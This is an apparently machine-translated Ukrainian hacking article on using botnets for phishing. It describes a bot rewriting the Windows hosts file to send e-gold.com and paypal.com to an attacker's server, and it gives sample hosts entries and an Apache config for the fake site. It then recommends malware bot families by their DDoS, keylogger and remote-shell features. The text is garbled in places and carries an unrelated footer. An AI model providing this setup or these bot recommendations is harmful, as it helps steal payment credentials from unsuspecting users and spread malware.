Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

фішинг
Дуже зручно використовувати ботів в якості організації фішингу. Для цього потрібні спеціальні заточені під фішинг сторінки адаптовані потрібний нам сайт і хороший хостинг, виділений сервер або VDS. Такі сторінки можна зробити самому, купити, знайти в мережі. Вибір величезний. Найчастіше фішинг організовується на сайти: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om і інші, так чи інакше, пов'язані з електронною комерції. Далі Windows бот переписує файл \ system32 \ drivers \ etc \ hosts додаючи в нього ip адресу вашого сервера і привласнюючи до нього Альяс потрібного вам сайту. Формат файлу такий:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Тобто, наберіть в браузері сайти e-gold.com і paypal.com користувач потрапляє на наш сервер нічого не підозрюючи. У свою чергу на сервері Фішера в httpd.conf додаються записи про відповідні доменах.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

Розуміти в рядку броузера буде всім знайомий адресу e-gold.com і навіть просунутий користувач залягання на сайт нічого не запідозривши. Для повноти картини, скажу, що якщо користувач використовує проксі сервер то цей спосіб працювати не буде

Боти на будь-який смак
Agobot / Phatbot / Forbot / XtremBot
Це найкраще сімейство спамерських пошукових роботів. Написані на С ++. Мають безліч функцій захисту від виявлення і налічують понад 500 модифікацій завдяки чітко вираженою модульній структурі.
SDBot / RBot / UrBot / UrXBot
Дуже популярні на даний момент боти для проведення DDOS атак. Мають безліч додатковий функцій. Таких як відкриття Sock4, кейлоггер, автоматичний сканер lsass і dcom вразливостей. Також має функцію перенаправлення запитів до сайтів антивірусних компаній на локальний сервер шляхом редагування \ system32 \ drivers \ etc \ hosts і установкою маленького підробленого web сервера на 80 порт.
DSNX Bots
Цей бот може проводити DDOS атаки, сканування портів і ще деякі дрібниці.
Q8 Bots
Відмінний бот під nix системи. Відрізняється своїм компактним кодом (27 Кб, складається з одного файлу) і непоганою функціональністю. Вміє динамічно оновлюючи шляхом скачування і запуску нового файлу. Добре реалізує основні реалізації DDOS (SYN-flood, UDP-flood). Вміє виконувати системні команди. Також непогано маскується в системі.
kaiten
Також непоганий бот під Unix / Linux системи. Вміє відкривати віддалений шелл на захоплених сервері.
Perl-based bots
Це дуже маленькі боти написані на Perl. Використовуються для DDOS атак на Unix-based системах.

---
Стаття має великий ухил в сторону хакинга, так що незрозуміло - питайте.

Примірка © 2021 Мобільні та комп'ютерні гаджети